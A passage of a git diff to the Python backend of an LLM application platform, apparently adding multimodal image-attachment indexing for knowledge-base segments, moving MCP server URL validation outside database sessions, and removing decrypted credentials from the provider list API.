segment_document.word_count - db.session.add(document) + db.session.add(segment_document) + # update document word count + assert document.word_count is not None + document.word_count += segment_document.word_count + db.session.add(document) + db.session.commit() + + if args["attachment_ids"]: + for attachment_id in args["attachment_ids"]: + binding = SegmentAttachmentBinding( + tenant_id=current_user.current_tenant_id, + dataset_id=document.dataset_id, + document_id=document.id, + segment_id=segment_document.id, + attachment_id=attachment_id, + ) + db.session.add(binding) db.session.commit() - # save vector index - try: - VectorService.create_segments_vector( - [args["keywords"]], [segment_document], dataset, document.doc_form - ) - except Exception as e: - logger.exception("create segment index failed") - segment_document.enabled = False - segment_document.disabled_at = naive_utc_now() - segment_document.status = "error" - segment_document.error = str(e) - db.session.commit() - segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() - return segment + # save vector index + try: + keywords = args.get("keywords") + keywords_list = [keywords] if keywords is not None else None + VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form) + except Exception as e: + logger.exception("create segment index failed") + segment_document.enabled = False + segment_document.disabled_at = naive_utc_now() + segment_document.status = "error" + segment_document.error = str(e) + db.session.commit() + segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() + return segment except LockNotOwnedError: pass @@ -2899,7 +2978,7 @@ class SegmentService: document.word_count = max(0, document.word_count + word_count_change) db.session.add(document) # update segment index task - if document.doc_form == IndexType.PARENT_CHILD_INDEX and args.regenerate_child_chunks: + if document.doc_form == IndexStructureType.PARENT_CHILD_INDEX and args.regenerate_child_chunks: # regenerate child chunks # get embedding model instance if dataset.indexing_technique == "high_quality": @@ -2926,12 +3005,11 @@ class SegmentService: .where(DatasetProcessRule.id == document.dataset_process_rule_id) .first() ) - if not processing_rule: - raise ValueError("No processing rule found.") - VectorService.generate_child_chunks( - segment, document, dataset, embedding_model_instance, processing_rule, True - ) - elif document.doc_form in (IndexType.PARAGRAPH_INDEX, IndexType.QA_INDEX): + if processing_rule: + VectorService.generate_child_chunks( + segment, document, dataset, embedding_model_instance, processing_rule, True + ) + elif document.doc_form in (IndexStructureType.PARAGRAPH_INDEX, IndexStructureType.QA_INDEX): if args.enabled or keyword_changed: # update segment vector index VectorService.update_segment_vector(args.keywords, segment, dataset) @@ -2976,7 +3054,7 @@ class SegmentService: db.session.add(document) db.session.add(segment) db.session.commit() - if document.doc_form == IndexType.PARENT_CHILD_INDEX and args.regenerate_child_chunks: + if document.doc_form == IndexStructureType.PARENT_CHILD_INDEX and args.regenerate_child_chunks: # get embedding model instance if dataset.indexing_technique == "high_quality": # check embedding model setting @@ -3002,15 +3080,15 @@ class SegmentService: .where(DatasetProcessRule.id == document.dataset_process_rule_id) .first() ) - if not processing_rule: - raise ValueError("No processing rule found.") - VectorService.generate_child_chunks( - segment, document, dataset, embedding_model_instance, processing_rule, True - ) - elif document.doc_form in (IndexType.PARAGRAPH_INDEX, IndexType.QA_INDEX): + if processing_rule: + VectorService.generate_child_chunks( + segment, document, dataset, embedding_model_instance, processing_rule, True + ) + elif document.doc_form in (IndexStructureType.PARAGRAPH_INDEX, IndexStructureType.QA_INDEX): # update segment vector index VectorService.update_segment_vector(args.keywords, segment, dataset) - + # update multimodel vector index + VectorService.update_multimodel_vector(segment, args.attachment_ids or [], dataset) except Exception as e: logger.exception("update segment index failed") segment.enabled = False @@ -3048,7 +3126,9 @@ class SegmentService: ) child_node_ids = [chunk[0] for chunk in child_chunks if chunk[0]] - delete_segment_from_index_task.delay([segment.index_node_id], dataset.id, document.id, child_node_ids) + delete_segment_from_index_task.delay( + [segment.index_node_id], dataset.id, document.id, [segment.id], child_node_ids + ) db.session.delete(segment) # update document word count @@ -3097,7 +3177,9 @@ class SegmentService: # Start async cleanup with both parent and child node IDs if index_node_ids or child_node_ids: - delete_segment_from_index_task.delay(index_node_ids, dataset.id, document.id, child_node_ids) + delete_segment_from_index_task.delay( + index_node_ids, dataset.id, document.id, segment_db_ids, child_node_ids + ) if document.word_count is None: document.word_count = 0 diff --git a/api/services/datasource_provider_service.py b/api/services/datasource_provider_service.py index 81e0c0ecd4..eeb14072bd 100644 --- a/api/services/datasource_provider_service.py +++ b/api/services/datasource_provider_service.py @@ -29,8 +29,14 @@ def get_current_user(): from models.account import Account from models.model import EndUser - if not isinstance(current_user._get_current_object(), (Account, EndUser)): # type: ignore - raise TypeError(f"current_user must be Account or EndUser, got {type(current_user).__name__}") + try: + user_object = current_user._get_current_object() + except AttributeError: + # Handle case where current_user might not be a LocalProxy in test environments + user_object = current_user + + if not isinstance(user_object, (Account, EndUser)): + raise TypeError(f"current_user must be Account or EndUser, got {type(user_object).__name__}") return current_user diff --git a/api/services/entities/knowledge_entities/knowledge_entities.py b/api/services/entities/knowledge_entities/knowledge_entities.py index 131e90e195..7959734e89 100644 --- a/api/services/entities/knowledge_entities/knowledge_entities.py +++ b/api/services/entities/knowledge_entities/knowledge_entities.py @@ -124,6 +124,14 @@ class KnowledgeConfig(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None name: str | None = None + is_multimodal: bool = False + + +class SegmentCreateArgs(BaseModel): + content: str | None = None + answer: str | None = None + keywords: list[str] | None = None + attachment_ids: list[str] | None = None class SegmentUpdateArgs(BaseModel): @@ -132,6 +140,7 @@ class SegmentUpdateArgs(BaseModel): keywords: list[str] | None = None regenerate_child_chunks: bool = False enabled: bool | None = None + attachment_ids: list[str] | None = None class ChildChunkUpdateArgs(BaseModel): diff --git a/api/services/entities/knowledge_entities/rag_pipeline_entities.py b/api/services/entities/knowledge_entities/rag_pipeline_entities.py index a97ccab914..cbb0efcc2a 100644 --- a/api/services/entities/knowledge_entities/rag_pipeline_entities.py +++ b/api/services/entities/knowledge_entities/rag_pipeline_entities.py @@ -23,7 +23,7 @@ class RagPipelineDatasetCreateEntity(BaseModel): description: str icon_info: IconInfo permission: str - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None yaml_content: str | None = None diff --git a/api/services/external_knowledge_service.py b/api/services/external_knowledge_service.py index 27936f6278..40faa85b9a 100644 --- a/api/services/external_knowledge_service.py +++ b/api/services/external_knowledge_service.py @@ -324,4 +324,5 @@ class ExternalDatasetService: ) if response.status_code == 200: return cast(list[Any], response.json().get("records", [])) - return [] + else: + raise ValueError(response.text) diff --git a/api/services/file_service.py b/api/services/file_service.py index 1980cd8d59..0911cf38c4 100644 --- a/api/services/file_service.py +++ b/api/services/file_service.py @@ -1,3 +1,4 @@ +import base64 import hashlib import os import uuid @@ -123,6 +124,15 @@ class FileService: return file_size <= file_size_limit + def get_file_base64(self, file_id: str) -> str: + upload_file = ( + self._session_maker(expire_on_commit=False).query(UploadFile).where(UploadFile.id == file_id).first() + ) + if not upload_file: + raise NotFound("File not found") + blob = storage.load_once(upload_file.key) + return base64.b64encode(blob).decode() + def upload_text(self, text: str, text_name: str, user_id: str, tenant_id: str) -> UploadFile: if len(text_name) > 200: text_name = text_name[:200] diff --git a/api/services/hit_testing_service.py b/api/services/hit_testing_service.py index dfb49cf2bd..8cbf3a25c3 100644 --- a/api/services/hit_testing_service.py +++ b/api/services/hit_testing_service.py @@ -1,3 +1,4 @@ +import json import logging import time from typing import Any @@ -5,6 +6,7 @@ from typing import Any from core.app.app_config.entities import ModelConfig from core.model_runtime.entities import LLMMode from core.rag.datasource.retrieval_service import RetrievalService +from core.rag.index_processor.constant.query_type import QueryType from core.rag.models.document import Document from core.rag.retrieval.dataset_retrieval import DatasetRetrieval from core.rag.retrieval.retrieval_methods import RetrievalMethod @@ -32,6 +34,7 @@ class HitTestingService: account: Account, retrieval_model: Any, # FIXME drop this any external_retrieval_model: dict, + attachment_ids: list | None = None, limit: int = 10, ): start = time.perf_counter() @@ -41,7 +44,7 @@ class HitTestingService: retrieval_model = dataset.retrieval_model or default_retrieval_model document_ids_filter = None metadata_filtering_conditions = retrieval_model.get("metadata_filtering_conditions", {}) - if metadata_filtering_conditions: + if metadata_filtering_conditions and query: dataset_retrieval = DatasetRetrieval() from core.app.app_config.entities import MetadataFilteringCondition @@ -66,6 +69,7 @@ class HitTestingService: retrieval_method=RetrievalMethod(retrieval_model.get("search_method", RetrievalMethod.SEMANTIC_SEARCH)), dataset_id=dataset.id, query=query, + attachment_ids=attachment_ids, top_k=retrieval_model.get("top_k", 4), score_threshold=retrieval_model.get("score_threshold", 0.0) if retrieval_model["score_threshold_enabled"] @@ -80,17 +84,24 @@ class HitTestingService: end = time.perf_counter() logger.debug("Hit testing retrieve in %s seconds", end - start) - - dataset_query = DatasetQuery( - dataset_id=dataset.id, - content=query, - source="hit_testing", - source_app_id=None, - created_by_role="account", - created_by=account.id, - ) - - db.session.add(dataset_query) + dataset_queries = [] + if query: + content = {"content_type": QueryType.TEXT_QUERY, "content": query} + dataset_queries.append(content) + if attachment_ids: + for attachment_id in attachment_ids: + content = {"content_type": QueryType.IMAGE_QUERY, "content": attachment_id} + dataset_queries.append(content) + if dataset_queries: + dataset_query = DatasetQuery( + dataset_id=dataset.id, + content=json.dumps(dataset_queries), + source="hit_testing", + source_app_id=None, + created_by_role="account", + created_by=account.id, + ) + db.session.add(dataset_query) db.session.commit() return cls.compact_retrieve_response(query, all_documents) @@ -167,10 +178,15 @@ class HitTestingService: @classmethod def hit_testing_args_check(cls, args): - query = args["query"] + query = args.get("query") + attachment_ids = args.get("attachment_ids") - if not query or len(query) > 250: - raise ValueError("Query is required and cannot exceed 250 characters") + if not attachment_ids and not query: + raise ValueError("Query or attachment_ids is required") + if query and len(query) > 250: + raise ValueError("Query cannot exceed 250 characters") + if attachment_ids and not isinstance(attachment_ids, list): + raise ValueError("Attachment_ids must be a list") @staticmethod def escape_query_for_search(query: str) -> str: diff --git a/api/services/model_provider_service.py b/api/services/model_provider_service.py index a9e2c72534..eea382febe 100644 --- a/api/services/model_provider_service.py +++ b/api/services/model_provider_service.py @@ -70,9 +70,28 @@ class ModelProviderService: continue provider_config = provider_configuration.custom_configuration.provider - model_config = provider_configuration.custom_configuration.models + models = provider_configuration.custom_configuration.models can_added_models = provider_configuration.custom_configuration.can_added_models + # IMPORTANT: Never expose decrypted credentials in the provider list API. + # Sanitize custom model configurations by dropping the credentials payload. + sanitized_model_config = [] + if models: + from core.entities.provider_entities import CustomModelConfiguration # local import to avoid cycles + + for model in models: + sanitized_model_config.append( + CustomModelConfiguration( + model=model.model, + model_type=model.model_type, + credentials=None, # strip secrets from list view + current_credential_id=model.current_credential_id, + current_credential_name=model.current_credential_name, + available_model_credentials=model.available_model_credentials, + unadded_to_model_list=model.unadded_to_model_list, + ) + ) + provider_response = ProviderResponse( tenant_id=tenant_id, provider=provider_configuration.provider.provider, @@ -95,7 +114,7 @@ class ModelProviderService: current_credential_id=getattr(provider_config, "current_credential_id", None), current_credential_name=getattr(provider_config, "current_credential_name", None), available_credentials=getattr(provider_config, "available_credentials", []), - custom_models=model_config, + custom_models=sanitized_model_config, can_added_models=can_added_models, ), system_configuration=SystemConfigurationResponse( diff --git a/api/services/rag_pipeline/rag_pipeline.py b/api/services/rag_pipeline/rag_pipeline.py index 097d16e2a7..f53448e7fe 100644 --- a/api/services/rag_pipeline/rag_pipeline.py +++ b/api/services/rag_pipeline/rag_pipeline.py @@ -1248,14 +1248,13 @@ class RagPipelineService: session.commit() return workflow_node_execution_db_model - def get_recommended_plugins(self) -> dict: + def get_recommended_plugins(self, type: str) -> dict: # Query active recommended plugins - pipeline_recommended_plugins = ( - db.session.query(PipelineRecommendedPlugin) - .where(PipelineRecommendedPlugin.active == True) - .order_by(PipelineRecommendedPlugin.position.asc()) - .all() - ) + query = db.session.query(PipelineRecommendedPlugin).where(PipelineRecommendedPlugin.active == True) + if type and type != "all": + query = query.where(PipelineRecommendedPlugin.type == type) + + pipeline_recommended_plugins = query.order_by(PipelineRecommendedPlugin.position.asc()).all() if not pipeline_recommended_plugins: return { diff --git a/api/services/tools/mcp_tools_manage_service.py b/api/services/tools/mcp_tools_manage_service.py index d641fe0315..252be77b27 100644 --- a/api/services/tools/mcp_tools_manage_service.py +++ b/api/services/tools/mcp_tools_manage_service.py @@ -15,7 +15,6 @@ from sqlalchemy.orm import Session from core.entities.mcp_provider import MCPAuthentication, MCPConfiguration, MCPProviderEntity from core.helper import encrypter from core.helper.provider_cache import NoOpProviderCredentialCache -from core.helper.tool_provider_cache import ToolProviderListCache from core.mcp.auth.auth_flow import auth from core.mcp.auth_client import MCPClientWithAuthRetry from core.mcp.error import MCPAuthError, MCPError @@ -65,6 +64,15 @@ class ServerUrlValidationResult(BaseModel): return self.needs_validation and self.validation_passed and self.reconnect_result is not None +class ProviderUrlValidationData(BaseModel): + """Data required for URL validation, extracted from database to perform network operations outside of session""" + + current_server_url_hash: str + headers: dict[str, str] + timeout: float | None + sse_read_timeout: float | None + + class MCPToolManageService: """Service class for managing MCP tools and providers.""" @@ -166,9 +174,6 @@ class MCPToolManageService: self._session.add(mcp_tool) self._session.flush() - # Invalidate tool providers cache - ToolProviderListCache.invalidate_cache(tenant_id) - mcp_providers = ToolTransformService.mcp_provider_to_user_provider(mcp_tool, for_list=True) return mcp_providers @@ -192,7 +197,7 @@ class MCPToolManageService: Update an MCP provider. Args: - validation_result: Pre-validation result from validate_server_url_change. + validation_result: Pre-validation result from validate_server_url_standalone. If provided and contains reconnect_result, it will be used instead of performing network operations. """ @@ -251,8 +256,6 @@ class MCPToolManageService: # Flush changes to database self._session.flush() - # Invalidate tool providers cache - ToolProviderListCache.invalidate_cache(tenant_id) except IntegrityError as e: self._handle_integrity_error(e, name, server_url, server_identifier) @@ -261,9 +264,6 @@ class MCPToolManageService: mcp_tool = self.get_provider(provider_id=provider_id, tenant_id=tenant_id) self._session.delete(mcp_tool) - # Invalidate tool providers cache - ToolProviderListCache.invalidate_cache(tenant_id) - def list_providers( self, *, tenant_id: str, for_list: bool = False, include_sensitive: bool = True ) -> list[ToolProviderApiEntity]: @@ -546,30 +546,39 @@ class MCPToolManageService: ) return self.execute_auth_actions(auth_result) - def _reconnect_provider(self, *, server_url: str, provider: MCPToolProvider) -> ReconnectResult: - """Attempt to reconnect to MCP provider with new server URL.""" + def get_provider_for_url_validation(self, *, tenant_id: str, provider_id: str) -> ProviderUrlValidationData: + """ + Get provider data required for URL validation. + This method performs database read and should be called within a session. + + Returns: + ProviderUrlValidationData: Data needed for standalone URL validation + """ + provider = self.get_provider(provider_id=provider_id, tenant_id=tenant_id) provider_entity = provider.to_entity() - headers = provider_entity.headers + return ProviderUrlValidationData( + current_server_url_hash=provider.server_url_hash, + headers=provider_entity.headers, + timeout=provider_entity.timeout, + sse_read_timeout=provider_entity.sse_read_timeout, + ) - try: - tools = self._retrieve_remote_mcp_tools(server_url, headers, provider_entity) - return ReconnectResult( - authed=True, - tools=json.dumps([tool.model_dump() for tool in tools]), - encrypted_credentials=EMPTY_CREDENTIALS_JSON, - ) - except MCPAuthError: - return ReconnectResult(authed=False, tools=EMPTY_TOOLS_JSON, encrypted_credentials=EMPTY_CREDENTIALS_JSON) - except MCPError as e: - raise ValueError(f"Failed to re-connect MCP server: {e}") from e - - def validate_server_url_change( - self, *, tenant_id: str, provider_id: str, new_server_url: str + @staticmethod + def validate_server_url_standalone( + *, + tenant_id: str, + new_server_url: str, + validation_data: ProviderUrlValidationData, ) -> ServerUrlValidationResult: """ Validate server URL change by attempting to connect to the new server. - This method should be called BEFORE update_provider to perform network operations - outside of the database transaction. + This method performs network operations and MUST be called OUTSIDE of any database session + to avoid holding locks during network I/O. + + Args: + tenant_id: Tenant ID for encryption + new_server_url: The new server URL to validate + validation_data: Provider data obtained from get_provider_for_url_validation Returns: ServerUrlValidationResult: Validation result with connection status and tools if successful @@ -579,25 +588,30 @@ class MCPToolManageService: return ServerUrlValidationResult(needs_validation=False) # Validate URL format - if not self._is_valid_url(new_server_url): + parsed = urlparse(new_server_url) + if not all([parsed.scheme, parsed.netloc]) or parsed.scheme not in ["http", "https"]: raise ValueError("Server URL is not valid.") # Always encrypt and hash the URL encrypted_server_url = encrypter.encrypt_token(tenant_id, new_server_url) new_server_url_hash = hashlib.sha256(new_server_url.encode()).hexdigest() - # Get current provider - provider = self.get_provider(provider_id=provider_id, tenant_id=tenant_id) - # Check if URL is actually different - if new_server_url_hash == provider.server_url_hash: + if new_server_url_hash == validation_data.current_server_url_hash: # URL hasn't changed, but still return the encrypted data return ServerUrlValidationResult( - needs_validation=False, encrypted_server_url=encrypted_server_url, server_url_hash=new_server_url_hash + needs_validation=False, + encrypted_server_url=encrypted_server_url, + server_url_hash=new_server_url_hash, ) - # Perform validation by attempting to connect - reconnect_result = self._reconnect_provider(server_url=new_server_url, provider=provider) + # Perform network validation - this is the expensive operation that should be outside session + reconnect_result = MCPToolManageService._reconnect_with_url( + server_url=new_server_url, + headers=validation_data.headers, + timeout=validation_data.timeout, + sse_read_timeout=validation_data.sse_read_timeout, + ) return ServerUrlValidationResult( needs_validation=True, validation_passed=True, @@ -606,6 +620,38 @@ class MCPToolManageService: server_url_hash=new_server_url_hash, ) + @staticmethod + def _reconnect_with_url( + *, + server_url: str, + headers: dict[str, str], + timeout: float | None, + sse_read_timeout: float | None, + ) -> ReconnectResult: + """ + Attempt to connect to MCP server with given URL. + This is a static method that performs network I/O without database access. + """ + from core.mcp.mcp_client import MCPClient + + try: + with MCPClient( + server_url=server_url, + headers=headers, + timeout=timeout, + sse_read_timeout=sse_read_timeout, + ) as mcp_client: + tools = mcp_client.list_tools() + return ReconnectResult( + authed=True, + tools=json.dumps([tool.model_dump() for tool in tools]), + encrypted_credentials=EMPTY_CREDENTIALS_JSON, + ) + except MCPAuthError: + return ReconnectResult(authed=False, tools=EMPTY_TOOLS_JSON, encrypted_credentials=EMPTY_CREDENTIALS_JSON) + except MCPError as e: + raise ValueError(f"Failed to re-connect MCP server: {e}") from e + def _build_tool_provider_response( self, db_provider: MCPToolProvider, provider_entity: MCPProviderEntity, tools: list ) -> ToolProviderApiEntity: diff --git a/api/services/trigger/webhook_service.py b/api/services/trigger/webhook_service.py index 4b3e1330fd..5c4607d400 100644 --- a/api/services/trigger/webhook_service.py +++ b/api/services/trigger/webhook_service.py @@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError from services.trigger.app_trigger_service import AppTriggerService from services.workflow.entities import WebhookTriggerData +try: + import magic +except ImportError: + magic = None # type: ignore[assignment] + logger = logging.getLogger(__name__) @@ -317,7 +322,8 @@ class WebhookService: try: file_content = request.get_data() if file_content: - file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger) + mimetype = cls._detect_binary_mimetype(file_content) + file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger) return {"raw": file_obj.to_dict()}, {} else: return {"raw": None}, {} @@ -341,6 +347,18 @@ class WebhookService: body = {"raw": ""} return body, {} + @staticmethod + def _detect_binary_mimetype(file_content: bytes) -> str: + """Guess MIME type for binary payloads using python-magic when available.""" + if magic is not None: + try: + detected = magic.from_buffer(file_content[:1024], mime=True) + if detected: + return detected + except Exception: + logger.debug("python-magic detection failed for octet-stream payload") + return "application/octet-stream" + @classmethod def _process_file_uploads( cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger diff --git a/api/services/variable_truncator.py b/api/services/variable_truncator.py index 6eb8d0031d..0f969207cf 100644 --- a/api/services/variable_truncator.py +++ b/api/services/variable_truncator.py @@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator): @overload def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ... + @overload + def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ... + def _truncate_json_primitives( self, - val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None, + val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None, target_size: int, ) -> _PartResult[Any]: """Truncate a value within an object to fit within budget.""" @@ -425,6 +428,9 @@ class VariableTruncator(BaseTruncator): return self._truncate_array(val, target_size) elif isinstance(val, dict): return self._truncate_object(val, target_size) + elif isinstance(val, File): + # File objects should not be truncated, return as-is + return _PartResult(val, self.calculate_json_size(val), False) elif val is None or isinstance(val, (bool, int, float)): return _PartResult(val, self.calculate_json_size(val), False) else: diff --git a/api/services/vector_service.py b/api/services/vector_service.py index abc92a0181..f1fa33cb75 100644 --- a/api/services/vector_service.py +++ b/api/services/vector_service.py @@ -4,11 +4,14 @@ from core.model_manager import ModelInstance, ModelManager from core.model_runtime.entities.model_entities import ModelType from core.rag.datasource.keyword.keyword_factory import Keyword from core.rag.datasource.vdb.vector_factory import Vector -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType +from core.rag.index_processor.index_processor_base import BaseIndexProcessor from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import Document +from core.rag.models.document import AttachmentDocument, Document from extensions.ext_database import db -from models.dataset import ChildChunk, Dataset, DatasetProcessRule, DocumentSegment +from models import UploadFile +from models.dataset import ChildChunk, Dataset, DatasetProcessRule, DocumentSegment, SegmentAttachmentBinding from models.dataset import Document as DatasetDocument from services.entities.knowledge_entities.knowledge_entities import ParentMode @@ -21,9 +24,10 @@ class VectorService: cls, keywords_list: list[list[str]] | None, segments: list[DocumentSegment], dataset: Dataset, doc_form: str ): documents: list[Document] = [] + multimodal_documents: list[AttachmentDocument] = [] for segment in segments: - if doc_form == IndexType.PARENT_CHILD_INDEX: + if doc_form == IndexStructureType.PARENT_CHILD_INDEX: dataset_document = db.session.query(DatasetDocument).filter_by(id=segment.document_id).first() if not dataset_document: logger.warning( @@ -70,12 +74,29 @@ class VectorService: "doc_hash": segment.index_node_hash, "document_id": segment.document_id, "dataset_id": segment.dataset_id, + "doc_type": DocType.TEXT, }, ) documents.append(rag_document) + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_document: AttachmentDocument = AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + multimodal_documents.append(multimodal_document) + index_processor: BaseIndexProcessor = IndexProcessorFactory(doc_form).init_index_processor() + if len(documents) > 0: - index_processor = IndexProcessorFactory(doc_form).init_index_processor() - index_processor.load(dataset, documents, with_keywords=True, keywords_list=keywords_list) + index_processor.load(dataset, documents, None, with_keywords=True, keywords_list=keywords_list) + if len(multimodal_documents) > 0: + index_processor.load(dataset, [], multimodal_documents, with_keywords=False) @classmethod def update_segment_vector(cls, keywords: list[str] | None, segment: DocumentSegment, dataset: Dataset): @@ -130,6 +151,7 @@ class VectorService: "doc_hash": segment.index_node_hash, "document_id": segment.document_id, "dataset_id": segment.dataset_id, + "doc_type": DocType.TEXT, }, ) # use full doc mode to generate segment's child chunk @@ -226,3 +248,92 @@ class VectorService: def delete_child_chunk_vector(cls, child_chunk: ChildChunk, dataset: Dataset): vector = Vector(dataset=dataset) vector.delete_by_ids([child_chunk.index_node_id]) + + @classmethod + def update_multimodel_vector(cls, segment: DocumentSegment, attachment_ids: list[str], dataset: Dataset): + if dataset.indexing_technique != "high_quality": + return + + attachments = segment.attachments + old_attachment_ids = [attachment["id"] for attachment in attachments] if attachments else [] + + # Check if there's any actual change needed + if set(attachment_ids) == set(old_attachment_ids): + return + + try: + vector = Vector(dataset=dataset) + if dataset.is_multimodal: + # Delete old vectors if they exist + if old_attachment_ids: + vector.delete_by_ids(old_attachment_ids) + + # Delete existing segment attachment bindings in one operation + db.session.query(SegmentAttachmentBinding).where(SegmentAttachmentBinding.segment_id == segment.id).delete( + synchronize_session=False + ) + + if not attachment_ids: + db.session.commit() + return + + # Bulk fetch upload files - only fetch needed fields + upload_file_list = db.session.query(UploadFile).where(UploadFile.id.in_(attachment_ids)).all() + + if not upload_file_list: + db.session.commit() + return + + # Create a mapping for quick lookup + upload_file_map = {upload_file.id: upload_file for upload_file in upload_file_list} + + # Prepare batch operations + bindings = [] + documents = [] + + # Create common metadata base to avoid repetition + base_metadata = { + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + } + + # Process attachments in the order specified by attachment_ids + for attachment_id in attachment_ids: + upload_file = upload_file_map.get(attachment_id) + if not upload_file: + logger.warning("Upload file not found for attachment_id: %s", attachment_id) + continue + + # Create segment attachment binding + bindings.append( + SegmentAttachmentBinding( + tenant_id=segment.tenant_id, + dataset_id=segment.dataset_id, + document_id=segment.document_id, + segment_id=segment.id, + attachment_id=upload_file.id, + ) + ) + + # Create document for vector indexing + documents.append( + Document(page_content=upload_file.name, metadata={**base_metadata, "doc_id": upload_file.id}) + ) + + # Bulk insert all bindings at once + if bindings: + db.session.add_all(bindings) + + # Add documents to vector store if any + if documents and dataset.is_multimodal: + vector.add_texts(documents, duplicate_check=True) + + # Single commit for all operations + db.session.commit() + + except Exception: + logger.exception("Failed to update multimodal vector for segment %s", segment.id) + db.session.rollback() + raise diff --git a/api/tasks/add_document_to_index_task.py b/api/tasks/add_document_to_index_task.py index 933ad6b9e2..e7dead8a56 100644 --- a/api/tasks/add_document_to_index_task.py +++ b/api/tasks/add_document_to_index_task.py @@ -4,9 +4,10 @@ import time import click from celery import shared_task -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -55,6 +56,7 @@ def add_document_to_index_task(dataset_document_id: str): ) documents = [] + multimodal_documents = [] for segment in segments: document = Document( page_content=segment.content, @@ -65,7 +67,7 @@ def add_document_to_index_task(dataset_document_id: str): "dataset_id": segment.dataset_id, }, ) - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -81,11 +83,25 @@ def add_document_to_index_task(dataset_document_id: str): ) child_documents.append(child_document) document.children = child_documents + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) documents.append(document) index_type = dataset.doc_form index_processor = IndexProcessorFactory(index_type).init_index_processor() - index_processor.load(dataset, documents) + index_processor.load(dataset, documents, multimodal_documents=multimodal_documents) # delete auto disable log db.session.query(DatasetAutoDisableLog).where(DatasetAutoDisableLog.document_id == dataset_document.id).delete() diff --git a/api/tasks/annotation/batch_import_annotations_task.py b/api/tasks/annotation/batch_import_annotations_task.py index 8e46e8d0e3..775814318b 100644 --- a/api/tasks/annotation/batch_import_annotations_task.py +++ b/api/tasks/annotation/batch_import_annotations_task.py @@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green")) start_at = time.perf_counter() indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" + active_jobs_key = f"annotation_import_active:{tenant_id}" + # get app info app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first() @@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: redis_client.setex(indexing_error_msg_key, 600, str(e)) logger.exception("Build index for batch import annotations failed") finally: + # Clean up active job tracking to release concurrency slot + try: + redis_client.zrem(active_jobs_key, job_id) + logger.debug("Released concurrency slot for job: %s", job_id) + except Exception as cleanup_error: + # Log but don't fail if cleanup fails - the job will be auto-expired + logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error) + + # Close database session db.session.close() diff --git a/api/tasks/clean_dataset_task.py b/api/tasks/clean_dataset_task.py index 5f2a355d16..b4d82a150d 100644 --- a/api/tasks/clean_dataset_task.py +++ b/api/tasks/clean_dataset_task.py @@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from core.tools.utils.web_reader_tool import get_image_upload_file_ids from extensions.ext_database import db from extensions.ext_storage import storage +from models import WorkflowType from models.dataset import ( AppDatasetJoin, Dataset, @@ -18,8 +19,11 @@ from models.dataset import ( DatasetQuery, Document, DocumentSegment, + Pipeline, + SegmentAttachmentBinding, ) from models.model import UploadFile +from models.workflow import Workflow logger = logging.getLogger(__name__) @@ -33,6 +37,7 @@ def clean_dataset_task( index_struct: str, collection_binding_id: str, doc_form: str, + pipeline_id: str | None = None, ): """ Clean dataset when dataset deleted. @@ -58,14 +63,20 @@ def clean_dataset_task( ) documents = db.session.scalars(select(Document).where(Document.dataset_id == dataset_id)).all() segments = db.session.scalars(select(DocumentSegment).where(DocumentSegment.dataset_id == dataset_id)).all() + # Use JOIN to fetch attachments with bindings in a single query + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where(SegmentAttachmentBinding.tenant_id == tenant_id, SegmentAttachmentBinding.dataset_id == dataset_id) + ).all() # Enhanced validation: Check if doc_form is None, empty string, or contains only whitespace # This ensures all invalid doc_form values are properly handled if doc_form is None or (isinstance(doc_form, str) and not doc_form.strip()): # Use default paragraph index type for empty/invalid datasets to enable vector database cleanup - from core.rag.index_processor.constant.index_type import IndexType + from core.rag.index_processor.constant.index_type import IndexStructureType - doc_form = IndexType.PARAGRAPH_INDEX + doc_form = IndexStructureType.PARAGRAPH_INDEX logger.info( click.style(f"Invalid doc_form detected, using default index type for cleanup: 